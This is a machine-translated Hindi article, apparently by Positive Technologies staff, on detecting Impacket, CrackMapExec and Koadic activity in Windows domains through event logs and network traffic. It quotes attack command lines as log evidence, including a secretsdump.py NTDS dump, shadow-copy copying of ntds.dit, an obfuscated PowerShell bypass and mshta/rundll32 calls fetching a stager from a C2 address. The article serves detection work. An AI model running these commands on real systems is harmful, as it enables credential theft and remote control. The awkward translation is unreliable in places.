विंडोज इंफ्रास्ट्रक्चर पर हमलों का पता कैसे लगाएं: हैकर टूल्स की खोज

कॉर्पोरेट सेक्टर में हमलों की संख्या हर साल बढ़ रही है: उदाहरण के लिए, 2017 में, 2016 की तुलना में 13% अधिक अनोखी घटनाएं दर्ज की गईं और 2018 के अंत तक, पिछली अवधि की तुलना में 27% अधिक घटनाएं दर्ज की गईं । उन लोगों को शामिल करना जहां मुख्य काम करने वाला उपकरण विंडोज ऑपरेटिंग सिस्टम है। 2017-2018 में, APT Dragonfly, APT28, APT मड्डीवॉटर समूहों ने यूरोप, उत्तरी अमेरिका और सऊदी अरब में सरकार और सैन्य संगठनों पर हमला किया। और उन्होंने इसके लिए तीन टूल का इस्तेमाल किया - इम्पैकेट , क्रैकपाउज़ेसिक और कोएडिक । उनका सोर्स कोड खुला और GitHub पर उपलब्ध है।

यह ध्यान देने योग्य है कि इन उपकरणों का उपयोग प्रारंभिक पैठ के लिए नहीं किया जाता है, बल्कि बुनियादी ढांचे के भीतर एक हमले के विकास के लिए किया जाता है। परिधि पर काबू पाने के बाद हमलावर, हमले के विभिन्न चरणों में उनका उपयोग करते हैं। इस तरह, नेटवर्क ट्रैफिक या औजारों में समझौते के निशान का पता लगाने के लिए केवल तकनीक की मदद से पता लगाना मुश्किल होता है और बुनियादी ढांचे में घुसने के बाद किसी हमलावर की सक्रिय क्रियाओं का पता लगा सकता है। उपकरण कई कार्य प्रदान करते हैं - रजिस्ट्री के साथ फाइल को स्थानांतरित करने से लेकर रिमोट मशीन पर कमांड निष्पादित करने तक। हमने उनकी नेटवर्क गतिविधि को निर्धारित करने के लिए इन उपकरणों का अध्ययन किया।

हमें क्या करने की आवश्यकता है:

• समझें कि हैकिंग टूल कैसे काम करते हैं । पता करें कि हमलावरों को क्या काम करना है और वे किन तकनीकों का उपयोग कर सकते हैं।
• एक हमले के पहले चरणों में सूचना सुरक्षा उपकरणों द्वारा क्या पता नहीं लगाया गया है । खुफिया चरण को छोड़ दिया जा सकता है, या तो क्योंकि हमलावर एक आंतरिक हमलावर है, या क्योंकि हमलावर बुनियादी ढांचे में एक अंतर का शोषण करता है जो पहले ज्ञात नहीं था। उसके कार्यों की पूरी श्रृंखला को बहाल करने का एक अवसर है, इसलिए आगे के आंदोलन का पता लगाने की इच्छा है।
• घुसपैठ का पता लगाने वाले उपकरणों के झूठे अलार्म को हटा दें । हमें यह नहीं भूलना चाहिए कि अकेले बुद्धिमत्ता के आधार पर कुछ क्रियाओं का पता लगाने पर, अक्सर त्रुटियां संभव हैं। आमतौर पर बुनियादी ढांचे में किसी भी जानकारी को प्राप्त करने के लिए वैध तरीके से पर्याप्त संख्या में, पहली नज़र में अविवेच्य हैं।

ये उपकरण हमलावरों को क्या देते हैं? यदि यह इम्पैकेट है, तो हमलावरों को मॉड्यूल की एक बड़ी लाइब्रेरी मिलती है, जिसका उपयोग परिधि के माध्यम से टूटने के बाद, हमले के विभिन्न चरणों में किया जा सकता है। कई उपकरण इम्पेकेट मॉड्यूल का उपयोग खुद के अंदर करते हैं - उदाहरण के लिए, मेटस्प्लोइट। इसमें रिमोट कमांड निष्पादन के लिए dcomexec और wmiexec है, जो इम्पेसेट से जोड़े गए मेमोरी से खातों को पुनः प्राप्त करने के लिए सीक्रेटडम्प है। नतीजतन, इस तरह के पुस्तकालय की गतिविधि का सही पता लगाना भी डेरिवेटिव का पता लगाना सुनिश्चित करेगा।

CrackMapExec (या सिर्फ CME) के बारे में, संयोग से रचनाकारों ने "इम्पैक्ट द्वारा संचालित" लिखा। इसके अलावा, सीएमई में लोकप्रिय परिदृश्यों के लिए तैयार कार्यक्षमता है: यह पासवर्ड या उनके हैश प्राप्त करने के लिए Mimikatz है, और रिमोट निष्पादन के लिए मीटरपरेटर या एम्पायर एजेंट का कार्यान्वयन और बोर्ड पर ब्लडहाउंड है।

तीसरा उपकरण जिसे हमने चुना है वह है Koadic। यह काफी ताज़ा है, 2017 में DEFCON 25 अंतरराष्ट्रीय हैकर सम्मेलन में प्रस्तुत किया गया था और इसमें एक गैर-मानक दृष्टिकोण है: HTTP, जावा स्क्रिप्ट और Microsoft विज़ुअल बेसिक स्क्रिप्ट (VBS) के माध्यम से काम करना। इस दृष्टिकोण को भूमि से दूर रहना कहा जाता है: उपकरण विंडोज में निर्मित निर्भरता और पुस्तकालयों के एक सेट का उपयोग करता है। निर्माता इसे COM कमांड कंट्रोल या C3 कहते हैं।

IMPACKET

Impacket की कार्यक्षमता बहुत विस्तृत है, AD के अंदर टोही से शुरू होती है और आंतरिक MS SQL सर्वर से डेटा एकत्र करती है, क्रेडेंशियल्स प्राप्त करने की तकनीकों के साथ समाप्त होती है: यह एक SMB रिले अटैक है और एक ntds.dit फ़ाइल प्राप्त करता है जिसमें उपयोगकर्ता पासवर्ड डोमेन नियंत्रक से नष्ट हो जाता है। इम्पेकेट चार अलग-अलग तरीकों का उपयोग करके दूरस्थ रूप से कमांड निष्पादित करता है: डब्लूएमआई के माध्यम से, विंडोज अनुसूचक, डीसीओएम और एसएमबी के प्रबंधन के लिए एक सेवा, और इसके लिए इसे क्रेडेंशियल की आवश्यकता है।

Secretsdump

आइए रहस्यों को देखें। यह एक मॉड्यूल है जिसका उद्देश्य उपयोगकर्ता मशीनों और डोमेन नियंत्रकों दोनों हो सकता है। इसका उपयोग करके, आप LSA, SAM, SECURITY, NTDS.dit मेमोरी क्षेत्रों की प्रतियां प्राप्त कर सकते हैं, इसलिए इसे हमले के विभिन्न चरणों में देखा जा सकता है। मॉड्यूल के संचालन में पहला कदम एसएमबी के माध्यम से प्रमाणीकरण है, जिसके लिए पास हैश हमले को स्वचालित रूप से संचालित करने के लिए उपयोगकर्ता पासवर्ड या इसके हैश की आवश्यकता होती है। अगला, सेवा नियंत्रण प्रबंधक (SCM) तक पहुंच खोलने और विनर प्रोटोकॉल का उपयोग करके रजिस्ट्री तक पहुंच प्राप्त करने का अनुरोध है, जिसके उपयोग से एक हमलावर उन शाखाओं के डेटा का पता लगा सकता है जो उसकी रुचि रखते हैं और एसएमबी के माध्यम से परिणाम प्राप्त कर सकते हैं।

अंजीर में। 1 हम देखते हैं कि एलएसए के साथ रजिस्टर कुंजी द्वारा विनर प्रोटोकॉल एक्सेस का उपयोग करते समय वास्तव में कैसे प्राप्त किया जाता है। ऐसा करने के लिए, DCERPC कमांड का उपयोग opcode 15 - OpenKey के साथ करें।


अंजीर। 1. winreg प्रोटोकॉल का उपयोग करके रजिस्ट्री कुंजी को खोलना

इसके अलावा, जब कुंजी पहुंच प्राप्त होती है, तो ओपकोड 20 के साथ SaveKey कमांड का उपयोग करके मानों को बचाया जाता है। इम्पेकेट इसे बहुत विशिष्ट बनाता है। यह एक फ़ाइल के मान को बचाता है जिसका नाम .tmp के साथ 8 यादृच्छिक वर्णों का एक स्ट्रिंग है। इसके अलावा, इस फ़ाइल का आगे अनलोडिंग S32 के माध्यम से System32 निर्देशिका (छवि 2) से होता है।


अंजीर। 2. दूरस्थ मशीन से रजिस्ट्री कुंजी प्राप्त करने की योजना

यह पता चला है कि आप नेटवर्क पर ऐसी गतिविधि का पता लगा सकते हैं, जिसमें कुछ रजिस्ट्री शाखाओं को जीतने के लिए प्रोटोकॉल, विशिष्ट नामों, आदेशों और उनके आदेश का उपयोग किया जाता है।

यह मॉड्यूल विंडोज इवेंट लॉग में निशान भी छोड़ देता है, जिसके कारण यह आसानी से पता लगाया जाता है। उदाहरण के लिए, एक आदेश के परिणामस्वरूप

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC 

Windows Server 2016 लॉग इन में, हम घटनाओं के निम्नलिखित मुख्य अनुक्रम देखेंगे:

1. 4624 - रिमोट लोगन।
2. 5145 - सुदूर winreg सेवा तक पहुंच अधिकारों का सत्यापन।
3. 5145 - System32 निर्देशिका में फ़ाइल अनुमतियों की जाँच। फ़ाइल में ऊपर उल्लिखित यादृच्छिक नाम है।
4. 4688 - vssadmin लॉन्च करने वाली cmd.exe प्रक्रिया बनाना:

 “C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 

5. 4688 - कमांड के साथ एक प्रक्रिया बनाना:

 "C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 

6. 4688 - कमांड के साथ एक प्रक्रिया बनाना:

 "C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 

7. 4688 - कमांड के साथ एक प्रक्रिया बनाना:

 "C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 

Smbexec

कई पोस्ट-शोषण साधनों की तरह, इम्पैकेट में रिमोट कमांड निष्पादन के लिए मॉड्यूल हैं। हम smbexec पर ध्यान केंद्रित करेंगे, जो एक रिमोट मशीन पर एक इंटरैक्टिव शेल प्रदान करता है। इस मॉड्यूल को किसी पासवर्ड या उसके हैश के साथ SMB प्रमाणीकरण की भी आवश्यकता होती है। अंजीर में। 3 हम एक उदाहरण देखते हैं कि ऐसा उपकरण कैसे काम करता है, इस मामले में यह एक स्थानीय व्यवस्थापक कंसोल है।


अंजीर। 3. स्मबेक्सैक इंटरएक्टिव कंसोल

प्रमाणीकरण के बाद smbexec में पहला चरण OpenSCManagerW कमांड (15) के साथ SCM खोल रहा है। अनुरोध उल्लेखनीय है: इसमें, मशीन नाम फ़ील्ड को DUMMY पर सेट किया गया है।


अंजीर। 4. सेवा नियंत्रण प्रबंधक खोलने का अनुरोध

इसके बाद, CreateServiceW (12) कमांड का उपयोग करके एक सेवा बनाई जाती है। स्मेकएक्स के मामले में, हम हर बार टीम के निर्माण के एक ही तर्क को देख सकते हैं। अंजीर में। 5 हरे रंग से कमांड के अपरिवर्तनीय मापदंडों का संकेत मिलता है, पीला - हमलावर क्या बदल सकता है। यह नोटिस करना आसान है कि निष्पादन योग्य फ़ाइल का नाम, उसकी निर्देशिका और आउटपुट फ़ाइल को बदला जा सकता है, लेकिन इम्पेकेट मॉड्यूल के तर्क का उल्लंघन किए बिना बाकी को और अधिक कठिन बदला जा सकता है।


अंजीर। 5. सेवा नियंत्रण प्रबंधक का उपयोग करके एक सेवा बनाने का अनुरोध

Smbexec भी विंडोज इवेंट लॉग में स्पष्ट निशान छोड़ देता है। IPconfig कमांड के साथ इंटरेक्टिव शेल के लिए विंडोज सर्वर 2016 लॉग में, हम घटनाओं के निम्नलिखित मुख्य अनुक्रम देखेंगे:

1. 4697 - पीड़ित की मशीन पर सेवा की स्थापना:

 %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 

2. 4688 - पैराग्राफ 1 से तर्कों के साथ cmd.exe प्रक्रिया का निर्माण।
3. 5145 - C $ निर्देशिका में __output फ़ाइल पर अनुमतियों की जाँच।
4. 4697 - पीड़ित की मशीन पर सेवा की स्थापना।

 %COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 

5. 4688 - अनुच्छेद 4 से तर्कों के साथ cmd.exe प्रक्रिया बनाना।
6. 5145 - सी $ डायरेक्टरी में __output फ़ाइल के एक्सेस अधिकारों की जाँच करना।

इंपेकेट, हमले के उपकरण विकसित करने की नींव है। यह विंडोज के बुनियादी ढांचे में लगभग सभी प्रोटोकॉल का समर्थन करता है और एक ही समय में इसकी अपनी विशेषताएं हैं। यहाँ विशिष्ट winreg अनुरोध हैं, और SCM API का उपयोग कमांड के चारित्रिक गठन और फ़ाइल नाम प्रारूप और SMB शेयर SYSTEM32 के साथ किया जाता है।

CRACKMAPEXEC

CME टूल को मुख्य रूप से उन नियमित क्रियाओं को स्वचालित करने के लिए डिज़ाइन किया गया है जो एक हमलावर को नेटवर्क के भीतर आगे बढ़ने के लिए प्रदर्शन करना है। यह आपको कुख्यात एम्पायर एजेंट और मीटरपरटर के साथ मिलकर काम करने की अनुमति देता है। गुप्त रूप से आदेशों को निष्पादित करने के लिए, सीएमई उन्हें बाधित कर सकता है। ब्लडहाउंड (एक अलग खुफिया उपकरण) का उपयोग करके, एक हमलावर सक्रिय डोमेन व्यवस्थापक सत्र के लिए खोज को स्वचालित कर सकता है।

खोजी कुत्ता

एक स्वतंत्र उपकरण के रूप में ब्लडहाउंड नेटवर्क के भीतर उन्नत बुद्धि के लिए अनुमति देता है। यह उपयोगकर्ताओं, मशीनों, समूहों, सत्रों के बारे में डेटा एकत्र करता है और पॉवरशेल या बाइनरी फ़ाइल पर स्क्रिप्ट के रूप में आता है। LDAP या SMB- आधारित प्रोटोकॉल का उपयोग सूचना एकत्र करने के लिए किया जाता है। सीएमई एकीकरण मॉड्यूल आपको पीड़ित को मशीन से रक्तध्वज डाउनलोड करने, निष्पादन के बाद एकत्र किए गए डेटा को चलाने और प्राप्त करने की अनुमति देता है, जिससे सिस्टम में कार्यों को स्वचालित किया जाता है और उन्हें कम ध्यान देने योग्य बनाया जाता है। ग्राफिकल शेल ब्लडहाउंड एकत्रित डेटा को रेखांकन के रूप में प्रस्तुत करता है, जो आपको हमलावर मशीन से डोमेन व्यवस्थापक के लिए सबसे छोटा रास्ता खोजने की अनुमति देता है।


अंजीर। 6. ब्लडहाउंड इंटरफ़ेस

पीड़ित की मशीन पर चलने के लिए, मॉड्यूल ATSVC और SMB का उपयोग करके एक कार्य बनाता है। ATSVC विंडोज टास्क शेड्यूलर के साथ काम करने के लिए एक इंटरफ़ेस है। CME नेटवर्क पर कार्य बनाने के लिए अपने NetrJobAdd (1) फ़ंक्शन का उपयोग करता है। CME मॉड्यूल क्या भेजता है इसका एक उदाहरण अंजीर में दिखाया गया है। 7: यह cmd.exe के लिए एक कॉल है और एक्सएमएल प्रारूप में तर्कों के रूप में अस्पष्ट कोड है।


चित्र 7। सीएमई के माध्यम से एक कार्य बनाना

टास्क पूरा होने के बाद, पीड़ित की मशीन ने ब्लडहाउंड को लॉन्च किया, और यह ट्रैफिक में देखा जा सकता है। मॉड्यूल मानक समूहों, डोमेन में सभी मशीनों और उपयोगकर्ताओं की एक सूची प्राप्त करने के लिए, SRVSVC NetSessEnum अनुरोध के माध्यम से सक्रिय उपयोगकर्ता सत्रों के बारे में जानकारी प्राप्त करने के लिए LDAP प्रश्नों की विशेषता है।


अंजीर। 8. SMB के माध्यम से सक्रिय सत्रों की सूची प्राप्त करना

इसके अलावा, ऑडिट सक्षम के साथ पीड़ित की मशीन पर रक्तध्वज का प्रक्षेपण आईडी 4688 (प्रक्रिया निर्माण) और प्रक्रिया नाम «C:\Windows\System32\cmd.exe» । इसमें उल्लेखनीय कमांड लाइन तर्क हैं:

 cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) " 

Enum_avproducts

कार्यक्षमता और कार्यान्वयन के दृष्टिकोण से, enum_avproducts मॉड्यूल बहुत दिलचस्प है। WMI विभिन्न विंडोज ऑब्जेक्ट्स से डेटा प्राप्त करने के लिए WQL क्वेरी भाषा का उपयोग करने की अनुमति देता है, जो अनिवार्य रूप से इस CME मॉड्यूल का उपयोग करता है। यह पीड़ित के मशीन पर स्थापित सुरक्षा उपायों के बारे में एंटीस्पाईवेयरप्रोडक्ट और एंटीएमरसप्रोडक्ट कक्षाओं के लिए अनुरोध करता है। आवश्यक डेटा प्राप्त करने के लिए, मॉड्यूल रूट \ SecurityCenter2 नामस्थान से जुड़ता है, फिर WQL क्वेरी उत्पन्न करता है और एक प्रतिक्रिया प्राप्त करता है। अंजीर में। चित्र 9 ऐसे अनुरोधों और प्रतिक्रियाओं की सामग्री को दर्शाता है। हमारे उदाहरण में, विंडोज डिफेंडर पाया गया था।


अंजीर। 9. enum_avproducts मॉड्यूल की नेटवर्क गतिविधि

अक्सर, WMI ऑडिट (ट्रेस WMI- गतिविधि), जिन घटनाओं में आप WQL प्रश्नों के बारे में उपयोगी जानकारी पा सकते हैं, उन्हें बंद कर दिया जा सकता है। लेकिन अगर इसे चालू किया जाता है, अगर enum_avproducts स्क्रिप्ट चलती है, तो ID 11 के साथ ईवेंट को सहेजा जाएगा। इसमें उस उपयोगकर्ता का नाम होगा, जिसने अनुरोध भेजा है और रूट \ SecurityCenter2 नामस्थान में नाम है।

सीएमई मॉड्यूल में से प्रत्येक ने अपनी स्वयं की कलाकृतियों को प्रकट किया, चाहे वह विशिष्ट WQL प्रश्न हों या कार्य शेड्यूलर में एक निश्चित प्रकार के कार्य का निर्माण जिसमें ओब्यूशन और एलडीएपी और एसएमबी में ब्लडहाउंड के लिए विशिष्ट गतिविधि हो।

KOADIC

Koadic की एक विशिष्ट विशेषता अंतर्निहित विंडोज़ दुभाषियों जावास्क्रिप्ट और VBScript का उपयोग है। इस अर्थ में, यह जमीन से दूर रहने की प्रवृत्ति का अनुसरण करता है - अर्थात, इसमें कोई बाहरी निर्भरता नहीं है और मानक विंडोज टूल का उपयोग करता है। यह पूर्ण कमांड एंड कंट्रोल (CnC) के लिए एक उपकरण है, क्योंकि संक्रमण के बाद, मशीन पर एक "प्रत्यारोपण" स्थापित किया जाता है, जो इसे नियंत्रित करने की अनुमति देता है। ऐसी मशीन, Koadic शब्दावली में, "ज़ोंबी" कहलाती है। पीड़ित पक्ष पर पूर्ण कार्य के लिए विशेषाधिकारों की कमी के साथ, कोएडिक में यूएसी बाईपास तकनीक का उपयोग करके उन्हें उठाने की क्षमता है।


अंजीर। 10. कमांड शेल कोडिक

पीड़ित को कमांड एंड कंट्रोल सर्वर के साथ संचार शुरू करना चाहिए। ऐसा करने के लिए, उसे एक पूर्व-तैयार यूआरआई के लिए आवेदन करने की आवश्यकता होती है और मुख्य स्टैडिक बॉडी में से एक का उपयोग करके प्राप्त करना होता है। अंजीर में। ११ में मस्तक के लिए एक उदाहरण दिखाया गया है।


अंजीर। 11. एक CnC सर्वर के साथ एक सत्र शुरू करना

प्रतिक्रिया चर WS का उपयोग करते हुए, यह स्पष्ट हो जाता है कि निष्पादन WScript.Shell के माध्यम से होता है, और चर STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE वर्तमान सत्र के मापदंडों के बारे में महत्वपूर्ण जानकारी रखते हैं। यह CnC सर्वर के लिए HTTP कनेक्शन में पहली अनुरोध-प्रतिक्रिया जोड़ी है। बाद के अनुरोधों को सीधे मॉड्यूल (प्रत्यारोपण) की कार्यक्षमता से संबंधित किया जाता है। सभी Koadic मॉड्यूल केवल CnC के साथ एक सक्रिय सत्र के साथ काम करते हैं।

Mimikatz

जिस तरह सीएमई ब्लडहाउंड के साथ काम करता है, कोआडिक मिमिक्जटै के साथ एक स्टैंडअलोन प्रोग्राम के रूप में काम करता है और इसे चलाने के कई तरीके हैं। नीचे एक Mimikatz प्रत्यारोपण लोड करने के लिए एक अनुरोध-प्रतिक्रिया जोड़ी है।


अंजीर। 12. Mimikatz का Koadic में स्थानांतरण

आप देख सकते हैं कि अनुरोध में URI प्रारूप कैसे बदल गया है। इसमें सीएसआरएफ चर का मान दिखाई दिया, जो चयनित मॉड्यूल के लिए जिम्मेदार है। उसके नाम पर ध्यान न दें; हम सभी जानते हैं कि CSRF को आमतौर पर अलग तरह से समझा जाता है। जवाब में, कोएडिक का वही मुख्य शरीर सामने आया, जिसमें मिमिकज़ैट से जुड़ा कोड जोड़ा गया था। यह काफी बड़ा है, इसलिए प्रमुख बिंदुओं पर विचार करें। इससे पहले कि हम बेस 64 एनकोडेड Mimikatz लाइब्रेरी है, क्रमबद्ध .NET वर्ग जो इसे इंजेक्ट करेगा, और Mimikatz चलाने के लिए तर्क देगा। निष्पादन का परिणाम स्पष्ट में नेटवर्क पर प्रेषित होता है।


अंजीर। 13. रिमोट मशीन पर Mimikatz चलाने का परिणाम

Exec_cmd

Koadic में ऐसे मॉड्यूल भी हैं जो दूरस्थ रूप से कमांड निष्पादित कर सकते हैं। यहाँ हम URI और परिचित चर और सीएसआरएफ बनाने की एक ही विधि देखेंगे। Exec_cmd मॉड्यूल के मामले में, कोड को शरीर में जोड़ा जाता है जो शेल कमांड को निष्पादित करने में सक्षम है। निम्नलिखित कोड CnC सर्वर की HTTP प्रतिक्रिया में दिखाया गया है।


अंजीर। 14. इम्प्लांट कोड exec_cmd

कोड निष्पादन के लिए परिचित WS विशेषता वाला GAWTUUGCFI चर आवश्यक है। इसकी मदद से, इम्प्लांट शेल को कॉल करता है, कोड की दो शाखाओं को संसाधित करता है - shell.exec आउटपुट डेटा स्ट्रीम की वापसी के साथ और शेल। बिना वापस लौटे।

Koadic एक विशिष्ट उपकरण नहीं है, लेकिन इसकी अपनी कलाकृतियाँ हैं जिनके द्वारा इसे वैध यातायात में पाया जा सकता है:

• HTTP अनुरोधों का विशेष गठन,
• winHttpRequests API का उपयोग करते हुए,
• ActiveXObject के माध्यम से WScript.Shell ऑब्जेक्ट बनाना,
• बड़े निष्पादन योग्य शरीर।

प्रारंभिक कनेक्शन दांव को शुरू करता है, इसलिए विंडोज घटनाओं के माध्यम से इसकी गतिविधि का पता लगाना संभव हो जाता है। Mshta के लिए, यह घटना 4688 है, जो एक लॉन्च विशेषता के साथ एक प्रक्रिया बनाने की बात करती है:

 C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6 

Koadic के निष्पादन के दौरान, आप अन्य 4688 घटनाओं को उन विशेषताओं के साथ देख सकते हैं जो इसे पूरी तरह से चित्रित करती हैं:

 rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;\..\..\..\mshtml,RunHTMLApplication rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;\..\..\..\mshtml,RunHTMLApplication "C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1 "C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1 

निष्कर्ष

भूमि की प्रवृत्ति से दूर रहने वाले घुसपैठियों के बीच लोकप्रियता हासिल कर रहे हैं। वे अपनी आवश्यकताओं के लिए अंतर्निहित विंडोज टूल और तंत्र का उपयोग करते हैं। हम देखते हैं कि इस सिद्धांत का पालन करने वाले लोकप्रिय Koadic, CrackMapExec और Impacket टूल APT रिपोर्ट्स में कैसे तेजी से पाए जाते हैं। इन उपकरणों के लिए गिटहब पर कांटे की संख्या भी बढ़ रही है, नए दिखाई देते हैं (अब उनमें से लगभग एक हजार हैं)। प्रवृत्ति अपनी सादगी के कारण लोकप्रियता हासिल कर रही है: हमलावरों को तीसरे पक्ष के उपकरण की आवश्यकता नहीं है, वे पहले से ही पीड़ितों की मशीनों पर हैं और सुरक्षा उपकरणों को बायपास करने में मदद करते हैं। हम नेटवर्क कनेक्टिविटी का अध्ययन करने पर ध्यान केंद्रित करते हैं: ऊपर वर्णित प्रत्येक उपकरण नेटवर्क ट्रैफ़िक पर अपनी छाप छोड़ता है; उनमें से एक विस्तृत अध्ययन ने हमें उनका पता लगाने के लिए हमारे उत्पाद पीटी नेटवर्क अटैक डिस्कवरी को सिखाने की अनुमति दी, जो अंततः साइबर घटनाओं की पूरी श्रृंखला की जांच करने में मदद करता है।

लेखक :

• एंटोन टायरिन, विशेषज्ञ सेवाओं के प्रमुख, पीटी विशेषज्ञ सुरक्षा केंद्र, सकारात्मक प्रौद्योगिकी
• Egor Podmokov, विशेषज्ञ, पीटी विशेषज्ञ सुरक्षा केंद्र, सकारात्मक प्रौद्योगिकी